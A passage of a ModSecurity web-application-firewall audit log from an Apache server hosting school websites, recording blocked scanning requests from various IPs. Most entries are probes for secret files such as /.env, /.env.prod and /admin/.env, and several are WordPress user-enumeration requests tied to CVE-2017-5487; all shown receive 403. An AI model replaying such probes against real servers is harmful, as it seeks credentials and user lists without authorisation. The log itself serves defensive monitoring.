sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fc35308-Z-- --cee3302f-A-- [08/Jun/2025:02:20:31 +0700] aESQ__ClubEPOra_8UlBlgAAABY 103.236.140.4 44910 103.236.140.4 8181 --cee3302f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.196 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --cee3302f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cee3302f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749324031660093 2171 (- - -) Stopwatch2: 1749324031660093 2171; combined=1063, p1=358, p2=677, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cee3302f-Z-- --540a3321-A-- [08/Jun/2025:02:55:37 +0700] aESZOWCOO9DrcKL2J_4zhwAAAMU 103.236.140.4 45496 103.236.140.4 8181 --540a3321-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.158.93.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.158.93.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --540a3321-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --540a3321-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749326137446262 2121 (- - -) Stopwatch2: 1749326137446262 2121; combined=1000, p1=340, p2=633, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --540a3321-Z-- --59a5b60e-A-- [08/Jun/2025:03:15:28 +0700] aESd4PClubEPOra_8UlBtgAAABY 103.236.140.4 45620 103.236.140.4 8181 --59a5b60e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 196.61.45.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.61.45.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --59a5b60e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59a5b60e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749327328444002 3365 (- - -) Stopwatch2: 1749327328444002 3365; combined=1530, p1=509, p2=988, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59a5b60e-Z-- --0be95838-A-- [08/Jun/2025:03:25:06 +0700] aESgIvClubEPOra_8UlBtwAAAAc 103.236.140.4 45702 103.236.140.4 8181 --0be95838-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0be95838-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0be95838-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327906811448 944 (- - -) Stopwatch2: 1749327906811448 944; combined=355, p1=304, p2=0, p3=0, p4=0, p5=51, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0be95838-Z-- --1a3a1e6b-A-- [08/Jun/2025:03:25:08 +0700] aESgJJANhDjQAvBdMyEMzwAAAIY 103.236.140.4 45704 103.236.140.4 8181 --1a3a1e6b-B-- GET /.env.save HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --1a3a1e6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a3a1e6b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327908093406 773 (- - -) Stopwatch2: 1749327908093406 773; combined=281, p1=234, p2=0, p3=0, p4=0, p5=47, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a3a1e6b-Z-- --b2a33656-A-- [08/Jun/2025:03:25:09 +0700] aESgJWCOO9DrcKL2J_4zkgAAAME 103.236.140.4 45706 103.236.140.4 8181 --b2a33656-B-- GET /.env.prod HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b2a33656-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2a33656-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327909157805 835 (- - -) Stopwatch2: 1749327909157805 835; combined=300, p1=263, p2=0, p3=0, p4=0, p5=37, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2a33656-Z-- --de53164f-A-- [08/Jun/2025:03:25:09 +0700] aESgJZANhDjQAvBdMyEM0AAAAJA 103.236.140.4 45708 103.236.140.4 8181 --de53164f-B-- GET /api/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --de53164f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de53164f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327909863750 934 (- - -) Stopwatch2: 1749327909863750 934; combined=351, p1=306, p2=0, p3=0, p4=0, p5=44, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de53164f-Z-- --5126bb3c-A-- [08/Jun/2025:03:25:10 +0700] aESgJpANhDjQAvBdMyEM0QAAAIE 103.236.140.4 45710 103.236.140.4 8181 --5126bb3c-B-- GET /dev/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5126bb3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5126bb3c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327910905571 670 (- - -) Stopwatch2: 1749327910905571 670; combined=264, p1=228, p2=0, p3=0, p4=0, p5=35, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5126bb3c-Z-- --484acf52-A-- [08/Jun/2025:03:25:11 +0700] aESgJ_ClubEPOra_8UlBuAAAABE 103.236.140.4 45712 103.236.140.4 8181 --484acf52-B-- GET /application/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --484acf52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --484acf52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327911906517 718 (- - -) Stopwatch2: 1749327911906517 718; combined=267, p1=232, p2=0, p3=0, p4=0, p5=34, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --484acf52-Z-- --4cb51f3b-A-- [08/Jun/2025:03:25:16 +0700] aESgLPClubEPOra_8UlBuQAAABc 103.236.140.4 45722 103.236.140.4 8181 --4cb51f3b-B-- GET /backend/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --4cb51f3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cb51f3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327916313922 719 (- - -) Stopwatch2: 1749327916313922 719; combined=263, p1=233, p2=0, p3=0, p4=0, p5=30, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cb51f3b-Z-- --f6a77e30-A-- [08/Jun/2025:03:25:17 +0700] aESgLZANhDjQAvBdMyEM1gAAAJI 103.236.140.4 45724 103.236.140.4 8181 --f6a77e30-B-- GET /.env.example HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f6a77e30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6a77e30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327917308275 682 (- - -) Stopwatch2: 1749327917308275 682; combined=252, p1=223, p2=0, p3=0, p4=0, p5=28, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6a77e30-Z-- --345ccc43-A-- [08/Jun/2025:03:25:18 +0700] aESgLpANhDjQAvBdMyEM1wAAAJc 103.236.140.4 45726 103.236.140.4 8181 --345ccc43-B-- GET /admin/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --345ccc43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --345ccc43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327918012679 643 (- - -) Stopwatch2: 1749327918012679 643; combined=251, p1=217, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --345ccc43-Z-- --c5dea70d-A-- [08/Jun/2025:04:12:03 +0700] aESrI8e0OZpePEzoRnpDFgAAAEw 103.236.140.4 46048 103.236.140.4 8181 --c5dea70d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 Accept-Charset: utf-8 --c5dea70d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5dea70d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749330723589599 776 (- - -) Stopwatch2: 1749330723589599 776; combined=276, p1=245, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5dea70d-Z-- --77bb2167-A-- [08/Jun/2025:04:20:43 +0700] aEStK8CyjFxjzV1Pwa0llgAAAAo 103.236.140.4 46084 103.236.140.4 8181 --77bb2167-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 46.101.117.67 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 46.101.117.67 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --77bb2167-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77bb2167-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749331243181616 909 (- - -) Stopwatch2: 1749331243181616 909; combined=365, p1=323, p2=0, p3=0, p4=0, p5=42, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77bb2167-Z-- --3f0d9d05-A-- [08/Jun/2025:05:09:08 +0700] aES4hMe0OZpePEzoRnpDVgAAAE0 103.236.140.4 46574 103.236.140.4 8181 --3f0d9d05-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; BLA-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36 Accept-Charset: utf-8 --3f0d9d05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f0d9d05-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749334148866293 897 (- - -) Stopwatch2: 1749334148866293 897; combined=397, p1=354, p2=0, p3=0, p4=0, p5=43, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f0d9d05-Z-- --e613281a-A-- [08/Jun/2025:05:33:20 +0700] aES-MKD1_iznf-QmBECBXwAAAIU 103.236.140.4 47138 103.236.140.4 8181 --e613281a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.30.85.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.30.85.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e613281a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e613281a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749335600229442 3333 (- - -) Stopwatch2: 1749335600229442 3333; combined=1416, p1=481, p2=904, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e613281a-Z-- --dec77614-A-- [08/Jun/2025:06:45:10 +0700] aETPBqD1_iznf-QmBECCRwAAAIc 103.236.140.4 48706 103.236.140.4 8181 --dec77614-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 Accept-Charset: utf-8 --dec77614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dec77614-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749339910060697 928 (- - -) Stopwatch2: 1749339910060697 928; combined=436, p1=393, p2=0, p3=0, p4=0, p5=42, sr=167, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dec77614-Z-- --d7eca652-A-- [08/Jun/2025:06:58:26 +0700] aETSIqD1_iznf-QmBECClAAAAII 103.236.140.4 48998 103.236.140.4 8181 --d7eca652-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; LG-H918 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 Accept-Charset: utf-8 --d7eca652-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7eca652-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749340706482033 789 (- - -) Stopwatch2: 1749340706482033 789; combined=332, p1=292, p2=0, p3=0, p4=0, p5=40, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7eca652-Z-- --cded3e69-A-- [08/Jun/2025:06:58:26 +0700] aETSIqD1_iznf-QmBECClQAAAIA 103.236.140.4 49000 103.236.140.4 8181 --cded3e69-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0 Accept-Charset: utf-8 --cded3e69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cded3e69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: 